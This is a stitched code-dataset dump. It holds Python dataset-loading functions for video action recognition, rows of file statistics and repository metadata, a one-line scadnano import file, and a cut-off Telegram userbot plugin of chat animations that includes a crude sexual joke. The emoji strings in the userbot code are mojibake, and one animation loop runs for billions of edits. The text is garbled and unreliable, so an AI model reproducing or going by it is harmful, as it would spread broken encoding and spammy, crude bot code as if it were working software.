def get_training_set(opt, spatial_transform, temporal_transform,
target_transform):
assert opt.dataset in ['kinetics', 'activitynet', 'ucf101', 'hmdb51','something','fire']
if opt.dataset == 'kinetics':
training_data = Kinetics(
opt.video_path+"/train_256",
opt.annotation_path,
'training',
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform)
elif opt.dataset == 'activitynet':
training_data = ActivityNet(
opt.video_path,
opt.annotation_path,
'training',
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform)
elif opt.dataset == 'ucf101':
opt.annotation_path = opt.annotation_path + "/train_rgb_ucf101.txt"
training_data = UCF101(
opt.video_path,
opt.annotation_path,
num_segments = opt.num_segments,
modality = opt.modality,
transform = spatial_transform)
elif opt.dataset == 'hmdb51':
opt.annotation_path = opt.annotation_path + "/train_rgb_hmdb51.txt"
training_data = HMDB51(
opt.video_path,
opt.annotation_path,
num_segments = opt.num_segments,
modality = opt.modality,
transform = spatial_transform)
elif opt.dataset == 'something':
training_data = Something(
opt.video_path,
opt.annotation_path,
'training',
spatial_transform=spatial_transform,
temporal_transform=temporal_transform,
target_transform=target_transform)
elif opt.dataset == 'fire':
opt.annotation_path = opt.annotation_path + "/train_fire.txt"
training_data = FIRE(
opt.video_path,
opt.annotation_path,
num_segments = opt.num_segments,
modality = opt.modality,
transform = spatial_transform)
return training_data
def get_validation_set(opt, spatial_transform, temporal_transform,
target_transform):
assert opt.dataset in ['kinetics', 'activitynet', 'ucf101', 'hmdb51','something','fire']
if opt.dataset == 'kinetics':
validation_data = Kinetics(
opt.video_path+"/val_256",
opt.annotation_path,
'validation',
opt.n_val_samples,
spatial_transform,
temporal_transform,
target_transform,
sample_duration=opt.sample_duration)
elif opt.dataset == 'activitynet':
validation_data = ActivityNet(
opt.video_path,
opt.annotation_path,
'validation',
opt.n_val_samples,
spatial_transform,
temporal_transform,
target_transform,
sample_duration=opt.sample_duration)
elif opt.dataset == 'ucf101':
opt.annotation_path = opt.annotation_path.replace("train","test")
#opt.annotation_path = opt.annotation_path + "/test_rgb_ucf101.txt"
validation_data = UCF101(
opt.video_path,
opt.annotation_path,
num_segments = opt.num_segments,
modality = opt.modality,
transform = spatial_transform,
test_mode = True)
elif opt.dataset == 'hmdb51':
opt.annotation_path = opt.annotation_path.replace("train","val")
validation_data = HMDB51(
opt.video_path,
opt.annotation_path,
num_segments = opt.num_segments,
modality = opt.modality,
transform = spatial_transform)
elif opt.dataset == 'fire':
opt.annotation_path = opt.annotation_path.replace("train","test")
validation_data = FIRE(
opt.video_path,
opt.annotation_path,
num_segments = opt.num_segments,
modality = opt.modality,
transform = spatial_transform)
elif opt.dataset == 'something':
validation_data = Something(
opt.video_path,
opt.annotation_path,
'validation',
opt.n_val_samples,
spatial_transform,
temporal_transform,
target_transform,
sample_duration=opt.sample_duration)
return validation_data
def get_test_set(opt, spatial_transform, temporal_transform, target_transform):
assert opt.dataset in ['kinetics', 'activitynet', 'ucf101', 'hmdb51','something','fire']
assert opt.test_subset in ['val', 'test']
if opt.test_subset == 'val':
subset = 'validation'
elif opt.test_subset == 'test':
subset = 'testing'
if opt.dataset == 'kinetics':
test_data = Kinetics(
opt.video_path,
opt.annotation_path,
subset,
0,
spatial_transform,
temporal_transform,
target_transform,
sample_duration=opt.sample_duration,
sample_stride=opt.sample_stride)
elif opt.dataset == 'activitynet':
test_data = ActivityNet(
opt.video_path,
opt.annotation_path,
subset,
0,
spatial_transform,
temporal_transform,
target_transform,
sample_duration=opt.sample_duration)
elif opt.dataset == 'ucf101':
opt.annotation_path = opt.annotation_path + "/test_rgb_ucf101.txt"
test_data = UCF101(
opt.video_path,
opt.annotation_path,
num_segments = opt.num_segments,
modality = opt.modality,
transform = spatial_transform,
test_mode = True)
elif opt.dataset == 'hmdb51':
test_data = HMDB51(
opt.video_path,
opt.annotation_path,
subset,
0,
spatial_transform,
temporal_transform,
target_transform,
sample_duration=opt.sample_duration)
elif opt.dataset == 'something':
test_data = Something(
opt.video_path,
opt.annotation_path,
subset,
0,
spatial_transform,
temporal_transform,
target_transform,
sample_duration=opt.sample_duration)
elif opt.dataset == 'fire':
opt.annotation_path = "/DATACENTER2/wxy/workspace/senet-3d/datasets/txt/test_fire.txt"
test_data = FIRE(
opt.video_path,
opt.annotation_path,
num_segments = opt.num_segments,
modality = opt.modality,
transform = spatial_transform,
test_mode=True,
test_idx=opt.test_idx)
return test_data
| 44.386935
| 152
| 0.479905
| 696
| 8,833
| 5.811782
| 0.079023
| 0.112485
| 0.147095
| 0.124598
| 0.81953
| 0.804697
| 0.804697
| 0.798269
| 0.768109
| 0.760198
| 0
| 0.016156
| 0.453413
| 8,833
| 198
| 153
| 44.611111
| 0.821665
| 0.007472
| 0
| 0.745946
| 0
| 0
| 0.060689
| 0.011864
| 0
| 0
| 0
| 0
| 0.021622
| 1
| 0.016216
| false
| 0
| 0.032432
| 0
| 0.064865
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3dbf5709a69a969116a377fdd1856375de1c22e2
| 42
|
py
|
Python
|
tests/__init__.py
|
scadnano-test-user/scadnano-python-package-1
|
9becb5a076579f6cbac1ebfeda514540bb84ab87
|
[
"MIT"
] | null | null | null |
tests/__init__.py
|
scadnano-test-user/scadnano-python-package-1
|
9becb5a076579f6cbac1ebfeda514540bb84ab87
|
[
"MIT"
] | null | null | null |
tests/__init__.py
|
scadnano-test-user/scadnano-python-package-1
|
9becb5a076579f6cbac1ebfeda514540bb84ab87
|
[
"MIT"
] | null | null | null |
from scadnano_copy.scadnano_copy import *
| 21
| 41
| 0.857143
| 6
| 42
| 5.666667
| 0.666667
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095238
| 42
| 1
| 42
| 42
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9a84dc5171b4740cf3433eae2b9f3d2c1e7238c0
| 19,909
|
py
|
Python
|
userbot/plugins/animazioni1.py
|
sethgld/userbotseth
|
2994aa84be57aed8ab036ed6f59342d9ca2f3cb2
|
[
"MIT"
] | null | null | null |
userbot/plugins/animazioni1.py
|
sethgld/userbotseth
|
2994aa84be57aed8ab036ed6f59342d9ca2f3cb2
|
[
"MIT"
] | null | null | null |
userbot/plugins/animazioni1.py
|
sethgld/userbotseth
|
2994aa84be57aed8ab036ed6f59342d9ca2f3cb2
|
[
"MIT"
] | null | null | null |
"""
Commands:
.hypno
.plane
.pula
.sega
.solarsystem
.sorpresa
"""
import os
import sys
import asyncio
from telethon import events
from userbot import CMD_HELP
from userbot import ALIVE_NAME
from userbot.utils import admin_cmd
from platform import uname
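# Display name used in animation captions; falls back to a placeholder when ALIVE_NAME is unset.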
DEFAULTUSER = str(ALIVE_NAME) if ALIVE_NAME else "I'M STUPID"
@borg.on(admin_cmd(pattern=f"hypno", outgoing=True))
async def _(event):
if event.fwd_from:
return
animation_interval = 0.3
animation_ttl = range(0, 15)
#input_str = event.pattern_match.group(1)
#if input_str == "hypno":
await event.edit("hypno")
animation_chars = [
"⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜",
"⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬛⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜",
"⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬛⬛⬛⬜⬜\n⬜⬜⬛⬜⬛⬜⬜\n⬜⬜⬛⬛⬛⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜",
"⬜⬜⬜⬜⬜⬜⬜\n⬜⬛⬛⬛⬛⬛⬜\n⬜⬛⬜⬜⬜⬛⬜\n⬜⬛⬜⬜⬜⬛⬜\n⬜⬛⬜⬜⬜⬛⬜\n⬜⬛⬛⬛⬛⬛⬜\n⬜⬜⬜⬜⬜⬜⬜",
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬜⬜⬜⬜⬜⬛\n⬛⬜⬜⬜⬜⬜⬛\n⬛⬜⬜⬜⬜⬜⬛\n⬛⬜⬜⬜⬜⬜⬛\n⬛⬜⬜⬜⬜⬜⬛\n⬛⬛⬛⬛⬛⬛⬛",
"⬛⬜⬛⬜⬛⬜⬛⬜\n⬜⬛⬜⬛⬜⬛⬜⬛\n⬛⬜⬛⬜⬛⬜⬛⬜\n⬜⬛⬜⬛⬜⬛⬜⬛\n⬛⬜⬛⬜⬛⬜⬛⬜\n⬜⬛⬜⬛⬜⬛⬜⬛\n⬛⬜⬛⬜⬛⬜⬛⬜\n⬜⬛⬜⬛⬜⬛⬜⬛",
"⬜⬛⬜⬛⬜⬛⬜⬛\n⬛⬜⬛⬜⬛⬜⬛⬜\n⬜⬛⬜⬛⬜⬛⬜⬛\n⬛⬜⬛⬜⬛⬜⬛⬜\n⬜⬛⬜⬛⬜⬛⬜⬛\n⬛⬜⬛⬜⬛⬜⬛⬜\n⬜⬛⬜⬛⬜⬛⬜⬛\n⬛⬜⬛⬜⬛⬜⬛⬜",
"⬜⬜⬜⬜⬜⬜⬜\n⬜⬛⬛⬛⬛⬛⬜\n⬜⬛⬜⬜⬜⬛⬜\n⬜⬛⬜⬛⬜⬛⬜\n⬜⬛⬜⬜⬜⬛⬜\n⬜⬛⬛⬛⬛⬛⬜\n⬜⬜⬜⬜⬜⬜⬜",
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬜⬜⬜⬜⬜⬛\n⬛⬜⬛⬛⬛⬜⬛\n⬛⬜⬛⬜⬛⬜⬛\n⬛⬜⬛⬛⬛⬜⬛\n⬛⬜⬜⬜⬜⬜⬛\n⬛⬛⬛⬛⬛⬛⬛",
"⬜⬜⬜⬜⬜⬜⬜\n⬜⬛⬛⬛⬛⬛⬜\n⬜⬛⬜⬜⬜⬛⬜\n⬜⬛⬜⬛⬜⬛⬜\n⬜⬛⬜⬜⬜⬛⬜\n⬜⬛⬛⬛⬛⬛⬜\n⬜⬜⬜⬜⬜⬜⬜",
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬜⬜⬜⬜⬜⬛\n⬛⬜⬛⬛⬛⬜⬛\n⬛⬜⬛⬜⬛⬜⬛\n⬛⬜⬛⬛⬛⬜⬛\n⬛⬜⬜⬜⬜⬜⬛\n⬛⬛⬛⬛⬛⬛⬛",
"⬜⬜⬜⬜⬜⬜⬜\n⬜⬛⬛⬛⬛⬛⬜\n⬜⬛⬜⬜⬜⬛⬜\n⬜⬛⬜⬛⬜⬛⬜\n⬜⬛⬜⬜⬜⬛⬜\n⬜⬛⬛⬛⬛⬛⬜\n⬜⬜⬜⬜⬜⬜⬜",
"⬛⬛⬛⬛⬛\n⬛⬜⬜⬜⬛\n⬛⬜⬛⬜⬛\n⬛⬜⬜⬜⬛\n⬛⬛⬛⬛⬛",
"⬜⬜⬜\n⬜⬛⬜\n⬜⬜⬜",
"[ð゚ムノð゚ヤᄡð゚ムネ])"
]
for i in animation_ttl:
await asyncio.sleep(animation_interval)
await event.edit(animation_chars[i % 15])
@borg.on(admin_cmd(pattern=f"plane", outgoing=True))
async def _(event):
if event.fwd_from:
return
await event.edit("✈-------------")
await event.edit("-✈------------")
await event.edit("--✈-----------")
await event.edit("---✈----------")
await event.edit("----✈---------")
await event.edit("-----✈--------")
await event.edit("------✈-------")
await event.edit("-------✈------")
await event.edit("--------✈-----")
await event.edit("---------✈----")
await event.edit("----------✈---")
await event.edit("-----------✈--")
await event.edit("------------✈-")
await event.edit("-------------✈")
await asyncio.sleep(3)
await event.delete()
@borg.on(admin_cmd(pattern=r"pula"))
async def _(event):
if event.fwd_from:
return
animation_interval = 0.2
animation_ttl = range(0, 12)
await event.edit("ð゚レᄄ ð゚ムᆴ")
animation_chars = [
"ð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ\nð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ\nð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ",
"ð゚ヤᄉð゚ヤᄉð゚ヤᄉ⬜⬜⬜ð゚ヤᄡð゚ヤᄡð゚ヤᄡ\nð゚ヤᄉð゚ヤᄉð゚ヤᄉ⬜⬜⬜ð゚ヤᄡð゚ヤᄡð゚ヤᄡ\nð゚ヤᄉð゚ヤᄉð゚ヤᄉ⬜⬜⬜ð゚ヤᄡð゚ヤᄡð゚ヤᄡ",
"ð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ\nð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ\nð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ",
"ð゚ヤᄉð゚ヤᄉð゚ヤᄉ⬜⬜⬜ð゚ヤᄡð゚ヤᄡð゚ヤᄡ\nð゚ヤᄉð゚ヤᄉð゚ヤᄉ⬜⬜⬜ð゚ヤᄡð゚ヤᄡð゚ヤᄡ\nð゚ヤᄉð゚ヤᄉð゚ヤᄉ⬜⬜⬜ð゚ヤᄡð゚ヤᄡð゚ヤᄡ",
"ð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ\nð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ\nð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ",
"ð゚ヤᄉð゚ヤᄉð゚ヤᄉ⬜⬜⬜ð゚ヤᄡð゚ヤᄡð゚ヤᄡ\nð゚ヤᄉð゚ヤᄉð゚ヤᄉ⬜⬜⬜ð゚ヤᄡð゚ヤᄡð゚ヤᄡ\nð゚ヤᄉð゚ヤᄉð゚ヤᄉ⬜⬜⬜ð゚ヤᄡð゚ヤᄡð゚ヤᄡ",
"ð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ\nð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ\nð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ",
"ð゚ヤᄉð゚ヤᄉð゚ヤᄉ⬜⬜⬜ð゚ヤᄡð゚ヤᄡð゚ヤᄡ\nð゚ヤᄉð゚ヤᄉð゚ヤᄉ⬜⬜⬜ð゚ヤᄡð゚ヤᄡð゚ヤᄡ\nð゚ヤᄉð゚ヤᄉð゚ヤᄉ⬜⬜⬜ð゚ヤᄡð゚ヤᄡð゚ヤᄡ",
"ð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ\nð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ\nð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ",
"ð゚ヤᄉð゚ヤᄉð゚ヤᄉ⬜⬜⬜ð゚ヤᄡð゚ヤᄡð゚ヤᄡ\nð゚ヤᄉð゚ヤᄉð゚ヤᄉ⬜⬜⬜ð゚ヤᄡð゚ヤᄡð゚ヤᄡ\nð゚ヤᄉð゚ヤᄉð゚ヤᄉ⬜⬜⬜ð゚ヤᄡð゚ヤᄡð゚ヤᄡ",
"ð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ\nð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ\nð゚ヤᄡð゚ヤᄡð゚ヤᄡ⬜⬜⬜ð゚ヤᄉð゚ヤᄉð゚ヤᄉ",
f"{DEFAULTUSER} **ð゚レᄄ ð゚ムᆴ♂» Oh no! è arrivata la pulað゚リ゙**"
]
for i in animation_ttl:
await asyncio.sleep(animation_interval)
await event.edit(animation_chars[i % 12])
@borg.on(admin_cmd(pattern="sega", outgoing=True))
async def _(event):
if event.fwd_from:
return
animation_interval = 0.2
animation_ttl = range(0, 100)
#input_str = event.pattern_match.group(1)
#if input_str == "sega":
await event.edit("sega")
animation_chars = [
"8✊️===D",
"8=✊️==D",
"8==✊️=D",
"8===✊️D",
"8==✊️=D",
"8=✊️==D",
"8✊️===D",
"8===✊️Dð゚メᆭ",
"8==✊️=Dð゚メᆭð゚メᆭ",
"8=✊️==Dð゚メᆭð゚メᆭð゚メᆭ"
]
for i in animation_ttl:
await asyncio.sleep(animation_interval)
        await event.edit(animation_chars[i % len(animation_chars)])
@borg.on(admin_cmd(pattern=f"snake", outgoing=True))
async def _(event):
if event.fwd_from:
return
animation_interval = 0.3
animation_ttl = range(0, 27)
#input_str = event.pattern_match.group(1)
#if input_str == "snake":
await event.edit("snake")
animation_chars = [
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◻️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◻️◻️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◻️◻️◻️️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◻️◻️◻️◻️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◼️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◻️◻️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◼️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◻️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◼️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◼️◼️◻️◻️\n◻️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◼️◼️◻️◻️\n◻️◼️◼️◻️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◼️◼️◻️◻️\n◻️◼️◻️◻️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◼️◼️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◻️◼️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◼️◻️◼️◻️\n◻️◻️◻️◻️◻️\n◻️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️"
]
for i in animation_ttl:
await asyncio.sleep(animation_interval)
await event.edit(animation_chars[i % 27])
@borg.on(admin_cmd(pattern=f"solarsystem", outgoing=True))
async def _(event):
if event.fwd_from:
return
animation_interval = 0.1
animation_ttl = range(0, 549755813888)
#input_str = event.pattern_match.group(1)
#if input_str == "solarsystem":
await event.edit("solarsystem")
animation_chars = [
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️ð゚フホ◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️◼️◼️◼️`",
"`◼️ð゚フユ◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️☀◼️`",
"`◼️◼️◼️ð゚フユ◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️☀◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️ð゚フホ◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️◼️◼️◼️`",
"`◼️☀◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️ð゚フユ◼️`",
"`◼️◼️◼️☀◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️ð゚フユ◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️ð゚フホ◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️◼️◼️◼️`",
"`◼️ð゚フユ◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️☀◼️`",
"`◼️◼️◼️ð゚フユ◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️☀◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️ð゚フホ◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️◼️◼️◼️`",
"`◼️☀◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️ð゚フユ◼️`",
"`◼️◼️◼️☀◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️ð゚フユ◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️ð゚フホ◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️◼️◼️◼️`",
"`◼️ð゚フユ◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️☀◼️`",
"`◼️◼️◼️ð゚フユ◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️☀◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️ð゚フホ◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️◼️◼️◼️`",
"`◼️☀◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️ð゚フユ◼️`",
"`◼️◼️◼️☀◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️ð゚フユ◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️ð゚フホ◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️◼️◼️◼️`",
"`◼️ð゚フユ◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️☀◼️`",
"`◼️◼️◼️ð゚フユ◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️☀◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️ð゚フホ◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️◼️◼️◼️`",
"`◼️☀◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️ð゚フユ◼️`",
"`◼️◼️◼️☀◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️ð゚フユ◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️ð゚フホ◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
